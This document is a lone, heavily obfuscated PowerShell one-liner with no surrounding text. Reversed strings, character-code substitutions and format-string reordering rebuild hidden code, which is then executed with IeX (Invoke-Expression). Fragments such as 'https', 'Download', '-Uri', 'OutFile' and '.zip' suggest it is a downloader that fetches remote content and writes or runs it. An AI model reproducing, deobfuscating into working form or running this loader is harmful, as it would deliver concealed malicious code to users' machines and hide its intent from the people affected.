"$( sEt-VAriaBlE  'ofs' '' ) " +( [StrINg][rEGex]::mAtCHes( ") )43]Rahc[,)84]Rahc[+511]Rahc[+801]Rahc[( eCAlpeR-  63]Rahc[,'ewr' eCAlpeR-  93]Rahc[,)97]Rahc[+401]Rahc[+96]Rahc[(eCAlpeR-)' ) )63]rAhC[,OhER3TOhE  eCALPerC- 93]rAhC[,)501]rAhC[+57]rAhC[+401]rAhC'+'[(  EcALpeR-  ))OhE((ECalPErOhE,OhE+iKh iKh+i'+'KhWiKh+iKh5OhE,OhEiKh+iKh)}iKh+iKhDaoiKh+iKhlnWd'+'ZrOdZriOhE,OhEUL3iKh+iKhtiKh+iKhaP-tseULiKh'+'+iKh3,ULiKh+iKh3iKh+iKhTiKh+iKhUL3iOhE,OhEh+'+'iKh:si'+'Kh+'+'iKhpiKh+iKhttiKh+iOhE,OhE+iKhOhE,OhEh+iKh}3{}0{}iKh+iKh4iKh+iKh{W5A(iKh+iKh& '+'   OhE,OhEiKh+iKh5A(. iKh+iKhOhE,OhEKhUL3.bUL3,UiKh+iKhLiKh+iKh3suiKh+iKhOhE,OhEh+iKhseiKh+iKhUL3iKh+iKh,UL3OhE,OhEiKhdZreLif{0Nm iKh+iKh)iKh+iKhUiKh+iKhL3hUL3,OhE,OhE0iKh+iKhNm iKh+iKh iKh+OhE,OhEL3iKh+iKhOhE,OhEiKh+iKhL3,iKh+iKhUL3aiKh+iKhtSUL3,iKh+iKhUL3sUiKh+iKhL3fiKh+iKh-iKh+iKhWiKh+iKh5AiKh+iKh}iKh+iKh0{}4iKh+i'+'Kh{}2iKh+iKh{'+'iKh+iKh}iOhE,OhEh}hiKh+iKhtAdiKh+iKhZiKh+iKhriKh+iKhPEiKh+iKhdiKh+iKhZrliF{0Nm eliKh+iKhiFtiKh+iKhuO- W5AiKh+iKhAW5AiKh+iKh.}I{0NiKh+iKhm irU-iKh+iKh iKh+iKh)iKh+iKhUL3iKh+iKhvnIiKh+iKhUiKh+iKhLiKh+iKh3,UiKh+OhE,OhEiKh+iKh 
}   iK'+'h+iKh 
{iKh+iKh iKh+iKhhctaiKh+iKhc    
iKh+iKh}   iKh+iKh iKh+iKh
;}HtAdZriKh+iKhPiKh+iKheiKh+iKhO'+'hE,OhElbaIrAV-tEg(( &O'+'hE,OhEKh+iKh'+'LiKh+iKh3aUL3({@iKh+iKh]tcejbOmiKh'+'+iKhoiKh+iKhtsiKh+iKhuiKh+iKhCSP[ iKh+iKh 
(@iKh+iKh'+' =iKh+iKh }ATiKh+iKhAiKh+iKhdZrDiKh+iKhEmdiKh+iKhZrOiKh+iKh'+'s{0Nm  iKh+iKh

iKhOhE,OhEiKh   iKh+iKh 
iKh+iKh{ yrtiKh+iKh  OhE,OhEh+iKhA}3{iKh+iKh}2iKh+iKh{}1iKhOhE,OhEKhh'+'UL3,UL3tiKh+iKhnemhiKh+iKh'+'cattaiKh+i'+'Kh-reULiKh+iKh'+'3f-iKh'+'OhE,OhE,ULiKh+iKh3iiKh'+'+iOhE,OhE iKh+O'+'hE,OhEiKhQXiKh+iKhULiKh+iKh3,UiKh+iKhLiKh+iKh3iK'+'h+iKh/mUL3,UiKh+iKhL3iKh+'+'i'+'KhPUL3,iKh+iKhUiKhOhE,OhEiKhmW5iKh+iKhAiKh+iKh = i'+'Kh+iKh}iKh+iKhhtiKh+iKhApdZriKh+iKhEdi'+'Kh+iKhZriKh+iKhLIf{OhE,OhEiKh iKh+iKh
{ )iKh+iKh}atiKh+iKhAOhE,OhEiKh{}3iKh+iKh{}5{}9{}01{iKh+iKh}OhE,OhEKhiKhnIoJ-]2,11,3[emaN.)iKh'+'*rdM*iKh eOhE,OhE/sUL3,UL3iKh+iKhocULiKh+iKh3iK'+'h+OhE,OhEiKh,iKh+iKh'+'UL3piiKh+iKhz.OiKh+OhE,OhE.)93]rOhE,OhEKh+iKhUL3OiKh+iKhUOhE,OhEKh+iKhf- W5A}2{}iKh+iKh'+'1{}'+'0iKh+iK'+'h{iKh+iKhWiKh+iKh5AiKh+iKh(.('+' fi   iKh+iKh OhE,OhEKh+iKh3{iKh+iKh}iKh+iKh1iKh+iKh{WOhE,OhEKh+iKhCUL3,UL3BiKh+iKhUiKh+iKhL3iKh+iKh f-iKh+iKh W5iKOhE,OhEL3OQXPDUL3,iKh+iKhUL3'+'iOhE,OhEiKh;W5AiKh+iKh)b.i'+'0Nm(0NmBQAPMET:viKh+i'+'Khne0NiKh+OhE,OhE  
;}iKh+iKheuRdZriKh+iKhT{iKh+iKh0NmiKh+iKh = iKh+iKh}iKh+i'+'KhDAdiKh+i'+'KhZiKhOhE,OhEiKh+iKh    OhE,OhEA}iKh+iKh4{iKh+iKh}iKh+iKh2iKh+iKh{}7{}6{iKh+iKh}0{}8iKh+OhE,OhE/iKh+iKhseiKh+iKh'+'l'+'ifOhE,OhEUL3,UL3DiKh+iKhCBO/i'+'Kh+iKh1i'+'Kh+iKh2iKh+iKhUiKh+iK'+'hL3,UL3672591OhE,OhErP-trUiKOhE,OhE{0iKh+iKhNiKh+i'+'Khm( iKh+iKhhiKh+iKhciKh+iKhaerof iKh+iKh 
iKh+iKh;)iKh+iKh
})iOhE,OhEiKh+iKh11{}1{WiKh+iKh5A(iKh+iKh iKh+iKh=iKh+iKh )UiOhE,OhEKhsm.iKh+iKh2UiKh+iKhLiKh+iKh3,UOhE,OhEh 
Oh'+'E,OhE
iKh+iKh{ OhE,OhErOdiKh+iKhZiKh+iKhriKh+iKhliKh+iK'+'hnwiKh+iKhdZrOd{iKh+iKh0NiKh+iKhm    iKh+iKh  
iKh+OhE'+',OhEKh+iKhd{0iKh+iKhNm( fiKh+iKhiiKh+iKh     iKh+iKh 
iKh+iKh }      
;}ESLi'+'Kh+iKhdiKh+'+'iKhZraFiKh+iKh{iKh+iKh0Nm = iKh+iKh}'+'DaOiKh+iKhdZiKh+iK'+'hriKh+iKhLNWiKh+iKhoD{0Nm iKh+iKh  iKh+OhE,OhEiKhL3eR-ULiKh+iKh3iKh+iKh,iKh+iKhUL3tsULi'+'Kh+iKh3,UiKh+i'+'KhL3doiKh+iKhhtiKh+iKheMULiKh+iKh3iKh+iKh,iKh+iKhUL3e'+'koUiKh+iKhL3iKh+iKh iKh+iKhf-iKh+iKh W5A}iKh+iKh1'+'{iKh+iKh}iKh+iKh2iKh+iKh{iKOhE,OhE( ( )iOhE,OhE+iKhL3/iKOhE,OhEh+iKhL3,UL3coUOhE,OhE}   iKh+iKh   
iKh+iKh iKh+iKh;iKh+iKOhE,OhEldZiKh'+'+iKhrIF{iK'+'h+iKh0NiKh+iKhm iKh+iKh)UL3iKOhE,OhE))69]rAHc[]gNirtS[,)001]rAHc[+09]rAHc[+411]rAHc[((ECalPEr.)29]rAHc[]gNirtS[,iKhBQAiKh(ECalPEr.)43]rAHc[]gNirtS[,)78]rAHc[+35]rAHc[+56]r'+'AHc[OhE,OhEKh+iKh)iKh+iKhUL3/UiKh+iKhLiKh+iOhE,OhEdZrdem'+'oiKh+iKhdiKh+iKhZrs{0NiKh'+'+iKhm iKh+iKhniKh+OhE,OhE+iKh{}0{}4{W5A(iKh+iKh =iKh+iKh )UiKh+iKhL3bUiKh+iKhL3( ;iOhE,OhEAHc[]gNirtS[,)58]rAHc[+67]rAHc[+15]rAHc[(('+'ECalPEr.)iKhR'+'3TiKh,iKh0N'+'miKh(ECalPEr.)iKh iKh+iK'+'h 
iKh+iKh
iKh'+'+iKh} OhE,OhE  iKh+iKh iKh+iKh iKh+iKOhE,OhEKh3,UL3iKh+iKhuhtigULiKh+iKh3,i'+'Kh+iOhE,OhEiKh    iKh+iKh 
iKh'+'+iKh{iKh+iKh )}hTAi'+'Kh+iKhdZrPiKh+OhE,OhEiKhi }IOhE f- 0'+'sl'+'}8{}46{}43{}4{}94{}9{}55{}22{}1'+'1{}15{}13{}75{}3{}81{}01{}05{}41{}85{}62{}71{}26{}51{}1{}45{}16{'+'}23'+'{}72{}95{}61{}82{}04{}35{}64{}24{}93{}6{}0{}12{}33{}25{}34{}91{'+'}92{}03{}54{}5{}7{}2{}65'+'{}32{}42{}6'+'3{}53{}14{}21{}06{}44{}36{}52{}83{}02{}74{}31{}73{}84{0sl(((( )OhEXOhE+'+']43[emOhSpewr+]12[emOHs'+'pewr ( . '((()'X'+]31[DiLlEhS$+]1[dILLEhS$ (&",'.','rIghtToLEft' ) |%{ $_ })+"$( sv  'OFs' ' ' )"| IeX
